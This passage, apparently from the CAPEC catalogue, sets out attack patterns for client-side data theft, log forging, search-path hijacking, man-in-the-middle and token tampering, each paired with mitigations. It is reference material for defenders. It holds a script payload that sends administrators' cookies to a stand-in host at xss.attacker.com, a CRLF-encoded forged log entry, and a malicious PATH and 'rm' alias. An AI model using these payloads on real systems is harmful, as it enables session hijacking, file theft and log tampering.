| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 23 | File System Function Injection, Content Based | Similar | | | 75 | Manipulating Writeable Configuration Files | Similar | |
| | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-01-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Gunnar Peterson | Cigital, Inc | 2007-02-28 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-09 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Related Attack Patterns | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 37 | | Typical Severity | Very High | | Description | Summary An attacker can resort to stealing data embedded in client distributions or client code in order to gain certain information. This information can reveal confidential contents, such as account numbers, or can be used as an intermediate step in a larger attack (such as by stealing keys/credentials). Attack Execution Flow Explore Identify Target: Attacker identifies client components to extract information from. These may be binary executables, class files, shared libraries (e.g., DLLs), or other machine code. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Binary file extraction. The attacker extracts binary files from zips, jars, wars, PDFs or other composite formats. | env-Local env-Embedded env-ClientServer env-Peer2Peer | | Package listing. The attacker uses a package manifest provided with the software installer, or the filesystem itself, to identify component files suitable for attack. | env-Local env-Embedded env-ClientServer env-Peer2Peer |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c37s1i1 | Positive | Proprietary or sensitive data is stored in a location ultimately distributed to end users. | env-Local env-Embedded env-ClientServer env-Peer2Peer | | c37s1i2 | Negative | Access to binary code is not realistic. For example, in a client-server environment, binary code on the server is presumed to be inscrutable to an attacker unless another vulnerability exposes it. | env-Web env-ClientServer env-Peer2Peer env-CommProtocol |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c37s1o1 | Success | The attacker identifies one or more files or data in the software to attack. |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c37s1s1 | Preventative | Obfuscation can make the observation and reverse engineering more difficult. It is only capable of delaying an attacker, however, not preventing a sufficiently motivated and resourced one. |
Experiment Apply mining techniques: The attacker then uses a variety of techniques, such as sniffing, reverse-engineering, and cryptanalysis to extract the information of interest. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| API Profiling. The attacker monitors the software's use of registry keys or other operating system-provided storage locations that can contain sensitive information. | env-Local env-Embedded env-ClientServer env-Peer2Peer | | Execution in simulator. The attacker physically removes mass storage from the system and explores it using a simulator, external system, or other debugging harness. | env-Local env-Embedded | | Cryptanalysis. The attacker performs cryptanalysis to identify data in the client component which may be cryptographically significant. (Key material frequently stands out as very high entropy data when compared to other mundane data). Given cryptographically significant data, other analyses are performed (e.g., length, internal structure, etc.) to determine potential algorithms (RSA, ECC, AES, etc.). This process proceeds until the attacker reaches a conclusion about the significance and use of the data. | env-Local env-Embedded env-ClientServer env-Peer2Peer | | Common decoding methods. The attacker applies methods to decode such encodings and compressions as Base64, unzip, unrar, RLE decoding, gzip decompression and so on. | env-All | | Common data typing. The attacker looks for common file signatures for well known file types (JPEG, TIFF, ASN.1, LDIF, etc.). If the signatures match, he attempts decoding in that format. | env-All |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c37s2i1 | Positive | Well known data types are used and embedded inside the client-accessible code. | env-Local env-Embedded env-ClientServer env-Peer2Peer | | c37s2i2 | Inconclusive | Proprietary data encodings are used. Although this incrementally increases the difficulty for an attacker to decode the data, it provides no better protection than well-known data types. Since few software developers are trained in obfuscation and cryptography, most proprietary encodings add little security value. | env-Local env-Embedded env-ClientServer env-Peer2Peer |
| Outcome |
|---|
| ID | Type | Description |
|---|
| c37s2o1 | Success | The attacker extracts useful information. |
| Security
Control |
|---|
| ID | Type | Description |
|---|
| c37s2s1 | Corrective | The software can contain an update mechanism, key management mechanism, or other means of updating proprietary data. Although this can react to a single breach, it is not an effective continuing solution. Many software manufacturers are lured into a repeated update cycle (c.f., satellite TV providers, iPhone) as hackers break proprietary data protection schemes. Planning to issue corrections is a poor long-term strategy, but it can be an effective stopgap measure until a design-level correction can be made. |
| | Attack Prerequisites | In order to feasibly execute this class of attacks, some valuable data must be present in client software. Additionally, this information must be unprotected, or protected in a flawed fashion, or through a mechanism that fails to resist reverse engineering, statistical, cryptanalytic, or other attack. | | Typical Likelihood of Exploit |
Very High
| | Methods of Attack | | | Examples-Instances | Description Using a tool such as 'strings' or similar to pull out text data, perhaps part of a database table, that extends beyond what a particular user's purview should be. Description An attacker can also use a decompiler to decompile a downloaded Java applet in order to look for information such as hardcoded IP addresses, file paths, passwords or other such contents. Description Attacker uses a tool such as a browser plug-in to pull cookie or other token information that, from a previous user at the same machine (perhaps a kiosk), allows the attacker to log in as the previous user. | | Attacker Skill or Knowledge Required | Medium: The attacker must possess knowledge of client code structure as well as ability to reverse-engineer or decompile it or probe it in other ways. This knowledge is specific to the technology and language used for the client distribution | | Resources Required | The attacker must possess access to the client machine or code being exploited. Such access, for this set of attacks, will likely be physical. The attacker will make use of reverse engineering technologies, perhaps for data or to extract functionality from the binary. Such tool use may be as simple as "Strings" or a hex editor. Removing functionality may require the use of only a hex editor, or may require aspects of the toolchain used to construct the application: for instance the Adobe Flash development environment. Attacks of this nature do not require network access or undue CPU, memory, or other hardware-based resources. | | Probing Techniques | Attackers may confine (and succeeed with) probing as simple as deleting a cache or data file, or less drastically twiddling its bits and then testing the mutation's effect on an executing client. At the other extreme, attackers capable of reverse engineering client code will have the ability to remove functionality or identify the whereabouts of sensitive data through whitebox analysis, such as review of reverse-engineered code. | | Attack Motivation-Consequences | - Information Leakage
- Data Modification
- Privilege Escalation
| | Context Description | This pattern of attacks possesses valid contexts regardless of architectural model, as long as some client side logic or data of interest exists.
Client/server, n-tier and thick clients should all be considered for vulnerability to this pattern. Counter-indications include multicast distribution channels in which servers dispense only public data and no client-side authentication or filtering occurs.
This pattern of attack need not depend on a particular platform, technology stack, or language. | | Injection Vector | This pattern of attacks possesses no injection vector, in its normal instances, as it affects clients fundamentally vulnerable to client-side trust issues. One exception to this rule exists: attacks making use of second-order injection attacks (SQL, XSS, or similar command injection) may 'deliver' an attack, through an intermediate server or data store, to a peer-client, or another user's use of the same client. In the case of the second instance (another user's use) this vector seems onerous but would be necessary in circumstances in which the hosting system protects the application well but implicitly trusts (potentially malicious) data received from the server (such as may be the case in kiosks well-protected through physical means). | | Activation Zone | Client-side software, whether it be a monolithic application, client/server, or n-tier (web-based). | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 525 | Information Leak Through Browser Caching | Targeted | | 312 | Cleartext Storage of Sensitive Information | Targeted | | 314 | Plaintext Storage in the Registry | Secondary | | 315 | Plaintext Storage in a Cookie | Secondary | | 318 | Plaintext Storage in Executable | Secondary |
| | Relevant Security Requirements | No sensitive or confidential information must be stored in client distributions. This includes content such as passwords or encryption keys. In cases where this is necessary, avoid storing any such information in plaintext All information arriving from a client must be validated before use. | | Related Security Principles | - Reluctance to Trust
- Never Assuming that Your Secrets Are Safe
| | Related Guidelines | - Never Use Unvalidated Input as Part of a Directive to any Internal Component
- Treat the Entire Inherited Process Context as Unvalidated Input
- Use Well-Known Cryptography Appropriately and Correctly
| | Purpose | Reconnaissance Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | Medium | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| John Steven | Cigital, Inc | 2007-02-10 | Initial core pattern content |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Chiradeep B. Chhaya | Cigital, Inc | 2007-02-23 | Fleshed out pattern with extra content |
|
| Attack Pattern ID | Pattern Abstraction: Standard 93 | | Typical Severity | High | | Description | Summary This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accoutability, non-repudiation and incident forensics capability. Attack Execution Flow Explore Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Determine logging utility being used by application (e.g. log4j) | env-All | | Gain access to application's source code to determine log file formats. | env-All | | Install or obtain access to instance of application and observe its log file format. | env-All |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c93s1o1 | Success | Attacker determines log file format used by application. | | c93s1o2 | Inconclusive | Attacker cannot conclusively determine log file format; he/she can only guess what the format is. |
Exploit Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example: "%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in" may add the following forged entry into a log file: "[Thu Nov 12 12:11:22]:Info: User admin logged in". Different applications may require different encodings of the carriage return and line feed characters. | env-All | | Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain <script>new Image().src="http://xss.attacker.com/log_cookie?cookie="+encodeURI(document.cookie);</script>. The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page). | env-All |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c93s2o1 | Success | Forged entry or other malicious data inserted into application's logs. | | c93s2o2 | Failure | No entry inserted into logs, or the entry is visibly distinguishable from real entries. |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c93s2sc1 | Preventative | Input validation to ensure that only legal characters supplied by users can be entered into log files | | c93s2sc2 | Preventative | Encode information from user such that any unexpected characters are encoded safely before they are entered into log files. | | c93s2sc3 | Preventative | Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however. |
| | Attack Prerequisites | The target host is logging the action and data of the user. The target host insufficiently protects acces to the logs or loggin mechanisms. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Analysis
- Modification of Resources
- Injection
| | Examples-Instances | Description Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. Related Vulnerability Description If a user submits the string "twenty-one" for val, the following entry is logged: INFO: Failed to parse val=twenty-one However, if an attacker submits the string "twenty-one%0a%0aINFO:+User+logged+out%3dbadguy", the following entry is logged: INFO: Failed to parse val=twenty-one INFO: User logged out=badguy Clearly, attackers can use this same mechanism to insert arbitrary log entries. (Source: CWE Log forging) | | Attacker Skill or Knowledge Required | Low/Medium:
Low: This attack can be as simple as adding extra characters to the logged data (e.g. unsername). Adding entries is typically easier than removing entries.
Medium: A more sophisticated attack can try to defeat the input validation mechanism. | | Probing Techniques | The attacker will try to determine which data may be logged in case of a success or failure of a predetermined action such as authentication. Once that data has been identified, the attacker may try to craft malicious data to inject. Vulnerability testing tool can be used to test the input validation mechanism. | | Solutions and Mitigations | Carefully control access to physical log files. Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data. Use synchronization to control the flow of execution. Use static analysis tools to identify log forging vulnerabilities. Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells. | | Attack Motivation-Consequences | | | Injection Vector | The variable being logged | | Payload | The malicious characters or the crafted data which should forge the log entry. | | Activation Zone | The logging mechanism (This can be as simple as writing to a file, logging API, etc.) | | Payload Activation Impact | Log tampering or forgery (misleading data) | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 117 | Incorrect Output Sanitization for Logs | Targeted | | 92 | Insufficient Sanitization of Custom Special Characters | Secondary | | 150 | Failure to Sanitize Escape, Meta, or Control Sequences | Secondary | | 713 | OWASP Top Ten 2007 Category A2 - Injection Flaws | Targeted |
| | Related Security Principles | | | Purpose | Obfuscation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | J. Viega and G. McGraw. Building Secure Software. Addison-Wesley, 2002. CWE - Log Forging A. Muffet. The night the log was forged. http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm. Secure Software - Log Injection : http://www.owasp.org/index.php/Log_injection Samate test case on Log Forging : http://samate.nist.gov/SRD/view_testcase.php?login=Guest&tID=1579 | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc. | 2007-03-25 | Identified priority for pattern creation |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Eric Dalci | Cigital, Inc. | 2007-03-25 | Fleshed out content for pattern | | Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise | | Amit Sethi | Cigital, Inc. | 2007-10-29 | Added extended Attack Execution Flow |
|
| Attack Pattern ID | Pattern Abstraction: Standard 38 | | Typical Severity | Very High | | Description | Summary This attack loads a malicious resource into a program's standard path used to bootstrap and/or provide contextual information for a program like a path variable or classpath. J2EE applications and other component based applications that are built from mutliple binaries can have very long list of dependencies to execute. If one of these libraries and/or references is controllable by the attacker then application controls can be circumvented by the attacker.
A standard UNIX path looks similar to this
/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin
If the attacker modifies the path variable to point to a locale that includes malicious resources then the user unwittingly can execute commands on the attacker's behalf:
/evildir/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin
This is a form of usurping control of the program and the attack can be done on the classpath, database resources, or any other resources built from compound parts. At runtime detection and blocking of this attack is nearly impossible, because the configuration allows execution. | | Attack Prerequisites | The attacker must be able to write to redirect search paths on the victim host. | | Typical Likelihood of Exploit |
High
| | Methods of Attack | - Modification of Resources
| | Examples-Instances | Description This attack can be accomplished in two ways. An attacker can insert a malicious program into the path or classpath so that when a known command is executed then the system instead executes the trojans. Another method is to redirect commands by aliasing one legitimate command to another to create unexpected results. the Unix command "rm" could be aliased to "mv" and move all files the victim thinks they are deleting to a directory the attacker controls. In a Unix shell .profile setting
alias rm=mv /usr/home/attacker
In this case the attacker retains a copy of all the files the victim attempts to remove. | | Attacker Skill or Knowledge Required | Low: to identify and execute against an overprivileged system interface | | Solutions and Mitigations | Design: Enforce principle of least privilege Design: Ensure that the program's compound parts, including all system dependencies, classpath, path, and so on, are secured to the same or higher level assurance as the program Implementation: Host integrity monitoring | | Attack Motivation-Consequences | - Run Arbitrary Code
- Privilege Escalation
| | Context Description | "Attack Pattern: Make Use of Configuration File Search Paths
If you place a copy of the configuration file into a previously empty location, the target program may find your version first and forgo any further searching. Most programs are not aware of security, so no check will be made against the owner of the file. The UNIX environment variable for PATH will sometimes specify that a program should look in multiple directories for a given file. Check these directories to determine whether you can sneak a Trojan file into the target."
[Hoglund and McGraw 04] | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 426 | Untrusted Search Path | Targeted | | 427 | Uncontrolled Search Path Element | Targeted | | 428 | Unquoted Search Path or Element | Secondary | | 706 | Use of Incorrectly-Resolved Name or Reference | Targeted |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 13 | Subverting Environment Variable Values | More Detailed | |
| | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| Medium | Medium | Medium |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| G. Hoglund and G. McGraw. Exploiting Software: How to Break Code. Addison-Wesley, February 2004. | Cigital, Inc | 2007-01-01 | |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Gunnar Peterson | Cigital, Inc | 2007-02-28 | Fleshed out content to CAPEC schema from the original descriptions in "Exploiting Software" | | Sean Barnum | Cigital, Inc | 2007-03-09 | Review and revise | | Richard Struse | VOXEM, Inc | 2007-03-26 | Review and feedback leading to changes in Name and Related Attack Patterns | | Sean Barnum | Cigital, Inc | 2007-04-13 | Modified pattern content according to review and feedback |
|
| Attack Pattern ID | Pattern Abstraction: Standard 94 | | Typical Severity | Very High | | Description | Summary This type of attack targets the communication between two components (typically client and server). The attacker places himself in the communication channel between the two components. Whenever one component attempts to communicate with the other (data flow, authentication challenges, etc.), the data first goes to the attacker, who has the opportunity to observe or alter it, and it is then passed on to the other component as if it was never intercepted. This interposition is transparent leaving the two compromised components unaware of the potential corruption or leakeage of their communications. The potential for Man-in-the-Middle attacks yields an implicit lack of trust in communication or identify between two components. Attack Execution Flow The attacker probes to determine the nature and mechanism of communication between two components looking for opportunities to exploit. The attacker inserts himself into the communication channel initially acting as a routing proxy between the two targeted components. The attacker may or may not have to use cryptography. The attacker observes, filters or alters passed data of its choosing to gain access to sensitive information or to manipulate the actions of the two target components for his own purposes.
| | Attack Prerequisites | There are two components communicating with each other. An attacker is able to identify the nature and mechanism of communication between the two target components. An attacker can eavesdrop on the communication between the target components. Strong mutual authentication is not used between the two target components yielding opportunity for attacker interposition. The communication occurs in clear (not encrypted) or with insufficient and spoofable encryption. | | Typical Likelihood of Exploit |
Very High
| | Methods of Attack | - Spoofing
- Analysis
- Modification of Resources
| | Examples-Instances | Description Symantec Scan Engine 5.0.0.24, and possibly other versions before 5.1.0.7, uses the same private DSA key for each installation, which allows remote attackers to conduct man-in-the-middle attacks and decrypt communications. Related Vulnerability | | Attacker Skill or Knowledge Required | Medium/High: This attack can get sophisticated since the attack may use cryptography. | | Probing Techniques | The attacker can try to get the public-keys of the victims. There are free software tool to perform man in the middle attack (packet anlaysis, etc.) | | Solutions and Mitigations | Get your Public Key signed by a Certificate Authority Encrypt your communication using cryptography (SSL,...) Use Strong mutual authentication to always fully authenticate both ends of any communications channel. Exchange public keys using a secure channel | | Attack Motivation-Consequences | - Data Modification
- Privilege Escalation
- Information Leakage
| | Context Description | A certificate binds an identity to a cryptographic key to authenticate a communicating party. Often, the certificate takes the encrypted form of the hash of the identity of the subject, the public key, and information such as time of issue or expiration using the issuer's private key. The certificate can be validated by deciphering the certificate with the issuer's public key. See also X.509 certificate signature chains and the PGP certification structure. | | Injection Vector | The captured or modified data in transit | | Payload | The new value of the data or the replay of the same data (e.g. credential) | | Activation Zone | The messages exchanged between the two target hosts. | | Payload Activation Impact | Privilege escalation. modification of resource, information leakage, etc. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 300 | Channel Accessible by Non-Endpoint (aka 'Man-in-the-Middle') | Targeted | | 290 | Authentication Bypass by Spoofing | Secondary | | 593 | Authentication Bypass: OpenSSL CTX Object Modified after SSL Objects are Created | Secondary | | 287 | Improper Authentication | Targeted | | 294 | Authentication Bypass by Capture-replay | Secondary | | 724 | OWASP Top Ten 2004 Category A3 - Broken Authentication and Session Management | Secondary |
| | Related Security Principles | | | Purpose | Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | High |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | References | CWE - Man-in-the-middle (MITM) M. Bishop. Computer Security: Art and Science. Addison-Wesley, 2003. | | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| Sean Barnum | Cigital, Inc. | 2007-03-25 | Identified priority for pattern creation |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
| Eric Dalci | Cigital, Inc. | 2007-03-25 | Fleshed out content for pattern | | Sean Barnum | Cigital, Inc | 2007-04-16 | Review and revise |
|
| Attack Pattern ID | Pattern Abstraction: Standard 39 | | Typical Severity | Medium | | Description | Summary In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation. Attack Execution Flow Explore Enumerate information passed to client side: The attacker identifies the parameters used as part of tokens to take business or security decisions | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use WebScarab to reveal hidden fields while browsing. | env-Web | | Use a sniffer to capture packets | env-ClientServer env-Peer2Peer env-CommProtocol | | View source of web page to find hidden fields | env-Web | | Examine URL to see if any opaque tokens are in it | env-Web | | Disassemble or decompile client-side application | env-ClientServer env-Peer2Peer | | Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc. | env-ClientServer env-Peer2Peer |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c39s1i1 | Positive | Opaque hidden form fields in a web page | env-Web | | c39s1i2 | Positive | Opaque session tokens/tickets | env-Web env-Peer2Peer env-ClientServer env-CommProtocol | | c39s1i3 | Positive | Opaque protocol fields | env-ClientServer env-Peer2Peer env-CommProtocol | | c39s1i4 | Positive | Opaque Resource Locator | env-Web env-Peer2Peer env-ClientServer env-CommProtocol |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c39s1o1 | Success | At least one opaque client-side token found | | c39s1o2 | Failure | No opaque client-side tokens found |
Determine protection mechanism for opaque token: The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may may be obfuscated or a full blown encryption may be used. | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Look for signs of well-known character encodings | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Look for cryptographic signatures | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Look for delimiters or other indicators of structure | env-Web env-ClientServer env-Peer2Peer env-CommProtocol |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c39s2i1 | Positive | Standard signatures of well-known encodings detected | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | c39s2i2 | Positive | Token or structural block's length being multiple of well-known block size of a cryptographic algorithm | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | c39s2i3 | Positive | Clear structural boundaries or delimiters | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | c39s2i4 | Negative | Failure outcome in previous step | env-Web env-ClientServer env-Peer2Peer env-CommProtocol |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c39s2o1 | Success | Protection/encoding scheme identified | | c39s2o2 | Failure | No information about protection/encoding scheme could not be determined |
Experiment Modify parameter/token values: Trying each parameter in turn, the attacker modifies the values | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Modify tokens logically | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Modify tokens arithmetically | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Modify tokens bitwise | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Modify structural components of tokens | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Modify order of parameters/tokens | env-Web env-ClientServer env-Peer2Peer env-CommProtocol |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c39s3i1 | Positive | Success outcome in first step. | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | c39s3i2 | Negative | Failure outcome in first step | env-Web env-ClientServer env-Peer2Peer env-CommProtocol |
Cycle through values for each parameter.: Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server | Attack Step
Techniques |
|---|
| Description | Environments |
|---|
| Use network-level packet injection tools such as netcat | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc. | env-Web | | Use modified client (modified by reverse engineering) | env-ClientServer env-Peer2Peer env-CommProtocol | | Use debugging tools to modify data in client | env-ClientServer env-Peer2Peer |
| Indicators of
Susceptibility |
|---|
| ID | Type | Description | Environments |
|---|
| c39s4i1 | Positive | Success outcome in first step | env-Web env-ClientServer env-Peer2Peer env-CommProtocol | | c39s4i2 | Negative | Failure outcome in first step | env-Web env-ClientServer env-Peer2Peer env-CommProtocol |
| Outcomes |
|---|
| ID | Type | Description |
|---|
| c39s4o1 | Success | Subversion of security controls on server | | c39s4o2 | Failure | Client token reset by server | | c39s4o3 | Inconclusive | Detailed error message describing problem with token, received from server |
| Security
Controls |
|---|
| ID | Type | Description |
|---|
| c39s4sc1 | Detective | Unexpected/invalid token/parameter value in application logs on server | | c39s4sc2 | Corrective | Reset session upon receipt of unexpected/invalid token/parameter value |
| | Attack Prerequisites | An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system. For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere. | | Typical Likelihood of Exploit |
Very High
| | Methods of Attack | - Modification of Resources
| | Examples-Instances | Description With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, he/she proceeds. Description Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. "u" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes "u" for "a" by flipping some of the corresponding bits of ciphertext (trial and error). Once the correct "flip" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode. Description Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. Related Vulnerability | | Attacker Skill or Knowledge Required | Medium: If the client site token is obfuscated.
High: If the client site token is encrypted. | | Resources Required | The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data. | | Probing Techniques | Tamper with the client side data token and observe the effects it has on interaction with the system. This attack is in and of itself a trial-and-error-based probing technique. | | Solutions and Mitigations | One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic "message authentication code" (or hMAC) is prescribed. However, this guidance is not a panecea. In particular, any value created by (and therefore encrypted by) the client, which itself is a "malicous" value, all the protective cryptography in the world can't make the value 'correct' again. Put simply, if the client has control over the whole process of generating and encoding the value--then simply protecting its integrity doesn't help. Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash) Make sure that all session tokens use a good source of randomness Perform validation on the server side to make sure that client side data tokens are consistent with what is expected. | | Attack Motivation-Consequences | - Data Modification
- Privilege Escalation
| | Context Description | The context in which this attack can operate is any circumstance in which important data, stored client-side, is reinterpreted by the client itself or a server-side component. The server-side component may or may not be the same system that produced the data (it is not in the given example instance). But, in all cases, the data stored is protected through some means--such as encryption. However, it's important to stipulate that the means used to protect this data does not employ an effetive integrity check. | | Related Weaknesses | | CWE-ID | Weakness Name | Weakness Relationship Type |
|---|
| 353 | Failure to Add Integrity Check Value | Targeted | | 285 | Improper Access Control (Authorization) | Secondary | | 302 | Authentication Bypass by Assumed-Immutable Data | Targeted | | 472 | External Control of Assumed-Immutable Web Parameter | Targeted | | 565 | Use of Cookies in Security Decision | Targeted | | 315 | Plaintext Storage in a Cookie | Targeted | | 539 | Information Leak Through Persistent Cookies | Targeted | | 384 | Session Fixation | Secondary | | 233 | Parameter Problems | Secondary |
| | Related Attack Patterns | | ID | Name | Relationship Type | Relationship Description |
|---|
| 31 | Accessing/Intercepting/Modifying HTTP Cookies | More Abstract | | | 22 | Exploiting Trust in Client (aka Make the Client Invisible) | More Detailed | |
| | Relevant Security Requirements | Sensitive information stored client side must be integrity checked upon return before use | | Related Security Principles | - Reluctance to Trust
- Never Assuming that your Secrets are Safe
- Least Privilege
- Complete Mediation
| | Related Guidelines | - Never Use Unvalidated Input as Part of a Directive to any Internal Component
| | Purpose | Penetration Exploitation | | CIA Impact | | Confidentiality Impact | Integrity Impact | Availability Impact |
|---|
| High | High | Low |
| | Technical Context | | Architectural Paradigm | Framework | Platform | Language |
|---|
| All | All | All | All |
| | Source | | Submission(s) |
|---|
| Submitter | Organization | Date | Comment |
|---|
| John Steven | Cigital, Inc | 2007-02-10 | Initial core pattern content |
| Modification(s) |
|---|
| Modifier | Organization | Date | Comment |
|---|
